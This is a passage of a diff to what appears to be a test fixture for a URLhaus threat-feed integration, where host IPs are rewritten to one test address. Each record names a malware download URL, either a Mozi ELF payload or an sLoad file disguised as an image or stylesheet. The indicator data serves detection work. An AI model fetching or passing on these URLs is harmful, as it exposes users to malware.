"2021-12-13T08:40:08.024782700Z", + "original": "{\"id\":\"961505\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961505/\",\"url\":\"http://89.160.20.156:56528/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2223,18 +2223,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://14.137.219.132:44427/Mozi.a", + "original": "http://89.160.20.156:44427/Mozi.a", "scheme": "http", "port": 44427, - "domain": "14.137.219.132", - "full": "http://14.137.219.132:44427/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44427/Mozi.a" }, - "ip": "14.137.219.132" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692643852Z", - "original": "{\"id\":\"961500\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961500/\",\"url\":\"http://14.137.219.132:44427/Mozi.a\",\"url_status\":\"online\",\"host\":\"14.137.219.132\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024791400Z", + "original": "{\"id\":\"961500\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961500/\",\"url\":\"http://89.160.20.156:44427/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2272,18 +2272,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.40.14:36134/Mozi.m", + "original": "http://89.160.20.156:36134/Mozi.m", "scheme": "http", "port": 36134, - "domain": "42.224.40.14", - "full": "http://42.224.40.14:36134/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36134/Mozi.m" }, - "ip": "42.224.40.14" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692647008Z", - "original": "{\"id\":\"961501\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961501/\",\"url\":\"http://42.224.40.14:36134/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.40.14\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024798600Z", + "original": "{\"id\":\"961501\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961501/\",\"url\":\"http://89.160.20.156:36134/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2321,18 +2321,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.104.107:43973/Mozi.m", + "original": "http://89.160.20.156:43973/Mozi.m", "scheme": "http", "port": 43973, - "domain": "186.33.104.107", - "full": "http://186.33.104.107:43973/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43973/Mozi.m" }, - "ip": "186.33.104.107" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692652107Z", - "original": "{\"id\":\"961502\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961502/\",\"url\":\"http://186.33.104.107:43973/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.104.107\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024805700Z", + "original": "{\"id\":\"961502\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961502/\",\"url\":\"http://89.160.20.156:43973/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2370,18 +2370,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://85.105.16.154:41319/Mozi.m", + "original": "http://89.160.20.156:41319/Mozi.m", "scheme": "http", "port": 41319, - "domain": "85.105.16.154", - "full": "http://85.105.16.154:41319/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41319/Mozi.m" }, - "ip": "85.105.16.154" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692655784Z", - "original": "{\"id\":\"961503\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961503/\",\"url\":\"http://85.105.16.154:41319/Mozi.m\",\"url_status\":\"online\",\"host\":\"85.105.16.154\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024812800Z", + "original": "{\"id\":\"961503\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961503/\",\"url\":\"http://89.160.20.156:41319/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2419,18 +2419,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://178.141.73.115:51847/Mozi.a", + "original": "http://89.160.20.156:51847/Mozi.a", "scheme": "http", "port": 51847, - "domain": "178.141.73.115", - "full": "http://178.141.73.115:51847/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51847/Mozi.a" }, - "ip": "178.141.73.115" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692659561Z", - "original": "{\"id\":\"961496\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961496/\",\"url\":\"http://178.141.73.115:51847/Mozi.a\",\"url_status\":\"online\",\"host\":\"178.141.73.115\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024819800Z", + "original": "{\"id\":\"961496\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961496/\",\"url\":\"http://89.160.20.156:51847/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2468,18 +2468,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.104.135:54469/Mozi.m", + "original": "http://89.160.20.156:54469/Mozi.m", "scheme": "http", "port": 54469, - "domain": "186.33.104.135", - "full": "http://186.33.104.135:54469/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:54469/Mozi.m" }, - "ip": "186.33.104.135" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692663779Z", - "original": "{\"id\":\"961497\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961497/\",\"url\":\"http://186.33.104.135:54469/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.104.135\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024826900Z", + "original": "{\"id\":\"961497\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961497/\",\"url\":\"http://89.160.20.156:54469/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2517,18 +2517,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.56.159.43:34547/Mozi.m", + "original": "http://89.160.20.156:34547/Mozi.m", "scheme": "http", "port": 34547, - "domain": "115.56.159.43", - "full": "http://115.56.159.43:34547/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34547/Mozi.m" }, - "ip": "115.56.159.43" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692667216Z", - "original": "{\"id\":\"961498\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961498/\",\"url\":\"http://115.56.159.43:34547/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.56.159.43\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024833900Z", + "original": "{\"id\":\"961498\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961498/\",\"url\":\"http://89.160.20.156:34547/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2566,18 +2566,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.230.138.170:33932/Mozi.m", + "original": "http://89.160.20.156:33932/Mozi.m", "scheme": "http", "port": 33932, - "domain": "42.230.138.170", - "full": "http://42.230.138.170:33932/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33932/Mozi.m" }, - "ip": "42.230.138.170" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692670432Z", - "original": "{\"id\":\"961499\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961499/\",\"url\":\"http://42.230.138.170:33932/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.230.138.170\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024840800Z", + "original": "{\"id\":\"961499\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961499/\",\"url\":\"http://89.160.20.156:33932/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2622,7 +2622,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692673748Z", + "ingested": "2021-12-13T08:40:08.024847800Z", "original": "{\"id\":\"961494\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961494/\",\"url\":\"https://univirtek.com/viro/02478080035/blank.jpg\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:51:47 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2668,7 +2668,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692676804Z", + "ingested": "2021-12-13T08:40:08.024854700Z", "original": "{\"id\":\"961495\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961495/\",\"url\":\"https://univirtek.com/viro/FRRNDR77C25D325O/map.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:51:47 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2714,7 +2714,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692680110Z", + "ingested": "2021-12-13T08:40:08.024861500Z", "original": "{\"id\":\"961492\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961492/\",\"url\":\"https://ladiesincode.com/ladi/CNNSRG83H04F158R/blank.jpg\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:51:45 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2760,7 +2760,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692683396Z", + "ingested": "2021-12-13T08:40:08.024868500Z", "original": "{\"id\":\"961493\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961493/\",\"url\":\"https://letonguesc.com/leto/02328510512/logo.css\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:51:45 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2806,7 +2806,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692687073Z", + "ingested": "2021-12-13T08:40:08.024875500Z", "original": "{\"id\":\"961490\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961490/\",\"url\":\"https://cxminute.com/minu/MLILSN74B21E507L/uk.png\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:51:44 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2852,7 +2852,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692690720Z", + "ingested": "2021-12-13T08:40:08.024882300Z", "original": "{\"id\":\"961491\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961491/\",\"url\":\"https://cxminute.com/minu/12875710159/blank.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:51:44 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2898,7 +2898,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692694537Z", + "ingested": "2021-12-13T08:40:08.024892900Z", "original": "{\"id\":\"961489\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961489/\",\"url\":\"https://cxminute.com/minu/CPNLNZ65M20A200N/maps.gif\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:51:41 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2944,7 +2944,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692697793Z", + "ingested": "2021-12-13T08:40:08.024900100Z", "original": "{\"id\":\"961488\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961488/\",\"url\":\"https://belfetproduction.com/bella/DLPCMN64D02D789E/logo.png\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:51:40 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -2990,7 +2990,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692701139Z", + "ingested": "2021-12-13T08:40:08.024907Z", "original": "{\"id\":\"961487\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961487/\",\"url\":\"https://belfetproduction.com/bella/01844510469/1x1.jpg\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:51:17 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3036,7 +3036,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692704396Z", + "ingested": "2021-12-13T08:40:08.024913900Z", "original": "{\"id\":\"961485\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961485/\",\"url\":\"https://ladiesincode.com/ladi/FRRDNI52M71E522D/logo.css\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:51:16 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3082,7 +3082,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692707812Z", + "ingested": "2021-12-13T08:40:08.024920900Z", "original": "{\"id\":\"961486\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961486/\",\"url\":\"https://letonguesc.com/leto/CPPMRC65E04H980Q/it.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:51:16 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3128,7 +3128,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692711639Z", + "ingested": "2021-12-13T08:40:08.024927800Z", "original": "{\"id\":\"961482\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961482/\",\"url\":\"https://univirtek.com/viro/06389650018/it.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:51:15 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3174,7 +3174,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692715376Z", + "ingested": "2021-12-13T08:40:08.024934800Z", "original": "{\"id\":\"961483\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961483/\",\"url\":\"https://belfetproduction.com/bella/CRSRRT61E15H501H/logo.png\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:51:15 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3220,7 +3220,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692718863Z", + "ingested": "2021-12-13T08:40:08.024941800Z", "original": "{\"id\":\"961484\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961484/\",\"url\":\"https://cxminute.com/minu/SMPMSM67P05F205U/it.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:51:15 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3266,7 +3266,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692722359Z", + "ingested": "2021-12-13T08:40:08.024948900Z", "original": "{\"id\":\"961480\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961480/\",\"url\":\"https://univirtek.com/viro/SBNPQL78A24A783E/uk.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:51:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3312,7 +3312,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692726176Z", + "ingested": "2021-12-13T08:40:08.024955700Z", "original": "{\"id\":\"961481\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961481/\",\"url\":\"https://cxminute.com/minu/15578761007/maps.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:51:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3358,7 +3358,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692729823Z", + "ingested": "2021-12-13T08:40:08.024962700Z", "original": "{\"id\":\"961478\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961478/\",\"url\":\"https://univirtek.com/viro/03079590133/1x1.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:51:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3404,7 +3404,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692733560Z", + "ingested": "2021-12-13T08:40:08.024969500Z", "original": "{\"id\":\"961479\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961479/\",\"url\":\"https://ladiesincode.com/ladi/BNCLNR77T56M082U/it.gif\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:51:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3450,7 +3450,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692736937Z", + "ingested": "2021-12-13T08:40:08.024976500Z", "original": "{\"id\":\"961476\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961476/\",\"url\":\"https://cxminute.com/minu/JNKMTJ64B29L424O/uk.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:45 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3496,7 +3496,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692740664Z", + "ingested": "2021-12-13T08:40:08.024983500Z", "original": "{\"id\":\"961477\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961477/\",\"url\":\"https://belfetproduction.com/bella/PGNMRA64S22I608Z/en.png\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:50:45 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3542,7 +3542,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692744250Z", + "ingested": "2021-12-13T08:40:08.024990300Z", "original": "{\"id\":\"961470\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961470/\",\"url\":\"https://cxminute.com/minu/RZKDRD77T23Z229T/logo.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3588,7 +3588,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692747647Z", + "ingested": "2021-12-13T08:40:08.024997400Z", "original": "{\"id\":\"961471\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961471/\",\"url\":\"https://fhivelifestyle.online/nhbrwvdffsgt/adf/maps.jpg\",\"url_status\":\"offline\",\"host\":\"fhivelifestyle.online\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3634,7 +3634,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692751063Z", + "ingested": "2021-12-13T08:40:08.025004500Z", "original": "{\"id\":\"961472\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961472/\",\"url\":\"https://belfetproduction.com/bella/05739900487/1x1.css\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3680,7 +3680,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692754470Z", + "ingested": "2021-12-13T08:40:08.025011400Z", "original": "{\"id\":\"961473\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961473/\",\"url\":\"https://belfetproduction.com/bella/01767180597/map.css\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3726,7 +3726,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692757956Z", + "ingested": "2021-12-13T08:40:08.025018400Z", "original": 